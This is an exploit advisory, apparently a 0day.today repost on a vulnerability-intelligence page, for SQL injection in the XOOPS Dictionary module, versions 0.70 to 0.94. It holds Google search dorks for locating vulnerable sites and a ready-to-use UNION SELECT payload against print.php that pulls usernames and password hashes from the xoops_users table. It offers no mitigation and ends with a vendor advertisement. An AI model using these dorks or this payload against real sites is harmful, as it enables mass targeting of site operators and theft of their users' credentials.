XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerabilit
==================================================================
XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
==================================================================
##########################################
#
# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
#
###########################################
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
###########################################
EXPLOIT :
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
###########################################
# 0day.today [2018-04-03] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo